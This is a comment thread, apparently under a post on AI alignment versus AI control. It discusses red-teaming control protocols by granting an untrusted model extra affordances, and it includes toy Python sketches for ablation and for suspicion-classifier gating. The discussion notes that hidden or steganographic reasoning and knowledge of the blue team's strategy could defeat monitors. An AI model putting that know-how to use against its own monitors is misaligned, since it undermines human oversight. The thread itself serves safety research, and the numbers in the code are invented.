7 Comments

I completely agree that control seems like a temporary patch to get useful work out of early TAIs rather than something you could use to safely deploy a superintelligence. Confidently aligning our models sure would be nice, but it looks increasingly likely to me that the AI race will proceed full steam ahead whether alignment is solved or not – and in that case it is imperative to ensure we can use early TAIs to help with alignment before it's too late, whether they are perfectly aligned or not. Control seems to me like one of the most tractable ways to do that.

One way to try to get closer to the upper bound of capability when red-teaming a control protocol is to give the untrusted model more affordances than it will actually have in practice, like a secret scratchpad, perfect knowledge of the blue team's strategy, best-of-n attacks, and help from human red-teamers. If the model becomes impossible to control with some generous set of extra affordances, determining which ones are necessary might help pin down the weaknesses of the control protocols being studied. For instance, if the model can beat a control protocol with a secret scratchpad but not without one, it becomes quite important to test whether the model is capable of steganographic or otherwise hidden reasoning. If some control protocols can be broken with perfect access to the blue team's strategy but not without it, it becomes imperative to keep control protocols a tightly held secret in practice and to ensure untrusted models are not trained on information that would let them make educated guesses.
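As a concrete illustration of that ablation, here is a minimal Python sketch. The affordance names, the run_control_eval function, and all the numbers in it are hypothetical stand-ins rather than measurements from any real evaluation: the idea is just to measure red-team success with the full, generous affordance set, then drop affordances one at a time to see which ones the attack actually depends on.

```python
import random

# Hypothetical affordances the red team might grant the untrusted model.
AFFORDANCES = ["secret_scratchpad", "blue_team_strategy", "best_of_n", "human_red_teamers"]

def run_control_eval(granted, n_trials=200, seed=0):
    """Stand-in for a real control evaluation: returns the red team's
    estimated success rate against the protocol when the untrusted model
    is granted the listed affordances. Here it is just a toy model in
    which each affordance independently boosts attack success."""
    rng = random.Random(seed)
    base = 0.02
    boost = {"secret_scratchpad": 0.15, "blue_team_strategy": 0.25,
             "best_of_n": 0.05, "human_red_teamers": 0.10}
    p = min(1.0, base + sum(boost[a] for a in granted))
    wins = sum(rng.random() < p for _ in range(n_trials))
    return wins / n_trials

# Success rate with the full, generous affordance set.
print(f"all affordances: {run_control_eval(AFFORDANCES):.2%}")

# Leave-one-out ablation: a large drop when an affordance is removed
# suggests the attack depends on it, so that affordance deserves its own
# capability evaluation (e.g. hidden/steganographic reasoning for the
# secret scratchpad).
for affordance in AFFORDANCES:
    rest = [a for a in AFFORDANCES if a != affordance]
    print(f"without {affordance}: {run_control_eval(rest):.2%}")
```

A leave-one-out pass like this is only a starting point; when affordances interact, ablating pairs or larger subsets may be needed to see which combination actually breaks the protocol.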


I agree that models don't need to be perfectly aligned to help with alignment research. The question is how much value control will add in the window when models are smart enough to cause misalignment problems but not yet so smart that control becomes difficult.

But maybe I'm objecting more on spiritual grounds: I worry that too much alignment research effort is directed towards exhibiting problems and controlling AI. The mainline goal should just be to solve alignment.

I'm not sold on the additional affordances. You might just make the model better along some axes and not others, and if you're not Pareto-dominating a fully elicited schemer, you can't be sure that you're red-teaming hard enough.
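To spell out the Pareto-dominance worry, here is a tiny sketch with hypothetical per-axis capability scores: the red-team proxy only licenses confidence if it matches or exceeds the fully elicited schemer on every attack-relevant axis, not merely on average.

```python
def dominates_or_matches(red_team, schemer):
    """True only if the red-team proxy is at least as capable as the
    (hypothetical) fully elicited schemer on every attack-relevant axis."""
    return all(red_team[axis] >= schemer[axis] for axis in schemer)

# Hypothetical scores: the boosted red-team model is better on average
# but worse at subtle sabotage, so its failure to beat the protocol does
# not bound what a real schemer could achieve.
red_team = {"code_sabotage": 0.9, "steganography": 0.8, "subtle_sabotage": 0.4}
schemer  = {"code_sabotage": 0.7, "steganography": 0.7, "subtle_sabotage": 0.6}
print(dominates_or_matches(red_team, schemer))  # False
```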

To be clear, I still think it's good to deploy suspicion ('sus') classifiers, but it seems rough to gain a lot of confidence that they're adding much safety margin.
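For concreteness, a minimal sketch of what deploying a suspicion classifier typically amounts to, with a hypothetical suspicion_score stand-in and an arbitrary audit threshold: score each action the untrusted model proposes, execute low-suspicion actions, and escalate the rest for review.

```python
def suspicion_score(action: str) -> float:
    """Stand-in for a trusted monitor that rates how suspicious a
    proposed action looks (0.0 = benign, 1.0 = highly suspicious)."""
    return 0.9 if "| sh" in action else 0.1  # toy heuristic

def route(action: str, audit_threshold: float = 0.5) -> str:
    """Execute low-suspicion actions; escalate the rest to human audit."""
    return "audit" if suspicion_score(action) >= audit_threshold else "execute"

print(route("pip install numpy"))                      # execute
print(route("curl http://example.com/setup.sh | sh"))  # audit
```

The difficulty the comment points to is estimating how much safety margin a gate like this adds against a model that is actively trying to keep its score below the threshold.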


I agree that there are difficulties with evaluating control techniques, but my sense is that the difficulties with evaluating alignment techniques are even bigger.

Curious what you think about the comparison. Does it seem easier to gain a lot of confidence that alignment techniques (of the kind realistically achievable in the next couple of years) are adding a big safety margin, compared to control techniques?


I am definitely optimistic! Alignment isn't optional, so there really isn't any way around this.


Jan, I think we both know that this is just counting angels on pinheads at this point, no?


Would you say we have a good understanding of how an aligned model ought to act? And if so, is ‘solving alignment’ in your opinion more about getting models to do that thing consistently, or do you feel we as humans still have some work to do envisioning how an aligned, highly capable entity is supposed to behave?

PS. Foucault would probably disagree with your final conclusion that alignment is not about control.


I would suggest that the first test of an aligned model is that it doesn't try to kill us, directly or indirectly?
